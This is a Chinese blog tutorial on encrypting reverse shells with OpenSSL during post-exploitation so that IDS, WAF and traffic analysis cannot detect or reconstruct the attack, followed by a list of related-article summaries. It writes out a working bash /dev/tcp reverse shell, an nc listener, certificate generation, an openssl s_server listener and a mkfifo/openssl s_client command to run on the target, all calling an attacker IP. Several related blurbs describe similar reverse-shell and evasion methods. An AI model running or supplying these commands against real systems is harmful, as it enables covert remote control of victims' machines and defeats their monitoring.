Openssl反弹加密shell

最新推荐文章于 2024-04-21 12:44:28 发布
最新推荐文章于 2024-04-21 12:44:28 发布
阅读量892 收藏 1
点赞数 1
分类专栏: 渗透测试 红队攻击指南 流量加密
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42094992/article/details/114803158
版权

使用Openssl反弹加密shell

 进行渗透测试得后渗透阶段为了进行横向渗透,往往需要反弹shell,如果反弹shell,如果反弹shell都是明文传输,如果内网有IDS或者防护软件会进行流量分析,很快被发现,如果攻击流量回溯分析。就可以复现攻击得过程,此时整个攻击就会被暴漏出来。

使用wireshark抓包直接看到输入得命令返回信息,这些命令会被WAF或者IPS所检测所以需要对这些信息进行加密。

wireshark抓取未加密得shell分析

bash -i >& /dev/tcp/192.168.31.96/8080 0>&1

nc -lvnp 8080

wireshark抓包获取

Openssl加密shell

在计算机网络上,OpenSSL是一个开放源代码得软件库包,应用程序可以使用这个包来进行安全通信,避免窃听。同时确认另一端连接者的身份,这个包广泛用于互联网的网页服务器上。

kali上使用Openssl生成自签名证书

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

在kali上监听端口

openssl s_server -quiet -key key.pem -cert cert.pem -port 8080

在目标上执行反弹shell命令

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.31.96:8080 > /tmp/s; rm /tmp/s

wireshark 查看Openssl加密过后的流量。

 

 

 

 

 

火中的冰~
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php实现基于openssl加密解密方法
10-21
主要介绍了php实现基于openssl加密解密方法,结合实例形式分析了php自定义函数实现基于openssl加密解密操作相关技巧,需要的朋友可以参考下
使用OpenSSL反弹shell
mirocky的博客
10-12 505
使用openssl进行反弹shell的过程
红队隧道加密OpenSSL加密反弹Shell(一)
xf555er的博客
11-26 983
OpenSSL是一个开源的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。这个包广泛被应用在互联网的网页服务器上其主要库是以C语言所写成,实现了基本的加密功能,实现了SSL与TLS协议。OpenSSL 可以运行在OpenVMS、 Microsoft Windows以及绝大多数类Unix操作系统上(包括Solaris,Linux,Mac OS X与各种版本的开放源代码BSD操作系统)。它也提供了一个移植版本,可以在IBM i(OS/400)上运作。
反弹shell 看这一篇就够了
最新发布
m0_69043895的博客
04-21 1519
在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。SSL协议要求建立在可靠的传输层协议(TCP)之上。SSL协议的优势在于它是与应用层协议独立无关的,高层的应用层协议(例如:HTTP,FTP,TELNET等)能透明地建立于SSL协议之上。SSL协议在应用层协议通信之前就已经完成加密算法、通信密钥的协商及服务器认证工作。在此之后应用层协议所传送的数据都会被加密,从而保证通信的私密性。
渗透测试-Linux反弹shell
lza20001103的博客
05-11 2999
Linux反弹shell
反弹Shell原理与实现
m0_62451321的博客
11-14 3119
Windows作为攻击者主机,Linux是被入侵主机(目标主机),此时目标主机上只要能正常运行Linux命令便可以实现反弹,利用Linux的Bash命令重定向和Windows上的Netcat应用程序,如果没有,则网络下载netcat应用程序即可。远程桌面,Web服务,SSH,SMB等等,都是正向连接。(3)对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知,所以建立一个服务端,让恶意程序主动连接,才是上策。(1)某客户机中了你的木马,但是它在局域网内,你直接连接不了。
WEB安全基础 - - -Linux反弹shell
weixin_67503304的博客
08-23 2919
详细讲解Linux反弹shell包含的NC正向shell,NC反向shell,bash反弹shell,无e参数反弹shell,Base64编码绕过,Telnet反弹shellOpenSSL反弹443端口,流量加密传输
C语言使用openSSL库DES模块实现加密功能详解
08-30
C语言使用openSSL库DES模块实现加密功能详解 在本文中,我们将详细介绍C语言使用openSSL库DES模块实现加密功能的相关知识点。首先,我们需要了解DES加密的基本概念。DES(Data Encryption Standard)是一种对称加密...
VC++运用OpenSSL实现对文件加密.zip
03-08
OpenSSL是一个开源库,提供了丰富的安全协议和加密算法,广泛应用于网络通信、数据加密以及数字签名等领域。本项目"VC++运用OpenSSL实现对文件加密"是将这两者结合,用于保护敏感文件的安全。 首先,我们要了解...
thrift通过openssl加密证书实现双向通信
08-08
thrift框架通过vs2013编译好的静态库,然后通过vs2013实现双向通信代码,通信协议利用openssl加密证书的方式来实现,本资源给出了完整的实现代码,证书可以在网上百度一下,看看如何生成客户端和服务端的,然后编译...
openssl des3加密
01-29
使用openssl对文件进行加密、编码
反弹Shell,看这一篇就够了
Appleteachers的博客
04-24 1155
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
利用OpenSSL搭建一个反弹shell
loon208的博客
04-01 596
渗透测试时有很多方法可以获得一个反弹shell,例如netcat、php、perl、.net、lolbins等等。但我最喜欢的方法之一利用是Openssl来获得一个反弹shell。是的,就是那个几乎每个https都要使用的库,我们先用openssl来生成密钥,最后再使用它来获取一个反弹shell。 准备 首先我们需要在自己的机器上生成密钥,这里用kali来演示。 root@kali#...
网络安全进阶篇之流量加密(十三章-1)使用 Openssl 反弹加密 shell
划水的小白白
05-19 869
文章目录零、什么是OpenSSL?一、为什么要进行流量加密二、抓取流量包三、对数据进行加密 零、什么是OpenSSL? 在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。这个包广泛被应用在互联网的网页服务器上。 一、为什么要进行流量加密 红队进行渗透测试的后续渗透阶段为了扩大战果,往往需要横行渗透,往往需要反弹 shell,如果反弹 shell 都是明文传输,那么内网里有 IDS 或者防护软件会进行流量进行分析,检测带有攻
反弹shell初识
无痕的博客
11-01 3997
反弹shell的指令与演示
利用OpenSSL加密反弹shell流量
The current road is different, love needs to distinguish between right and wrong
02-15 3220
简介 在进行后渗透阶段的时候通常为了进一步横向操作往往需要反弹 shell,但是反弹 shell 方式都有一个缺点,流量是以明文方式进行传输的。进行流量分析的话就会很快被发现,如果对攻击流量进行溯源分析,检测带有攻击的特征,就可以复现攻击过程。 实验环境 kali:192.168.95.128 centos:192.168.95.147 Wireshark抓包 在kali上使用nc监听一个端口 nc -lvvp 4444 将centos的shell反弹过去 bash -i
反弹shell汇总(超详细)
qq_52173020的博客
05-27 7132
反弹shell姿势大全
使用 OpenSSL 反弹加密 shell
weixin_30810583的博客
04-12 226
Referrence:https://xax007.github.io/2019-03-07-reverse-encrypted-shell-with-openssl/ 目录 前言 OpenSSL 简介 使用 OpenSSL 生成证书自签名证书 使用 OpenSSL 反弹加密 shell Linux Windows 使用 OpenSSL 搭建简易 HTTPS Ser...
渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Windows篇(゚益゚メ) 渗透测试
寻觅的博客
04-07 3041
文章目录反弹shell介绍常用反弹方式NetCat(NC)反弹正向NC反向NCmshta.exe利用msf利用模块方法一(msfconsole)方法二(msfvenom)Cobaltstrike利用模块hta攻击源码rundll32.exe利用msf利用模块方法一(msfconsole)方法二(msfvenom)Rundll32加载htaRegsvr32.exe利用msiexec.exe利用powershell脚本绕过杀软混淆处理 反弹shell介绍 反弹shell主要就是让我们能远程连接到目标控制台并且下
openssl公钥加密
03-13
下面是使用OpenSSL进行公钥加密的步骤: 1. 生成密钥对:首先需要生成一对公钥和私钥。可以使用OpenSSL提供的命令行工具或者编程接口来生成密钥对。 2. 加载公钥:将生成的公钥加载到程序中,可以从文件中读取或者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值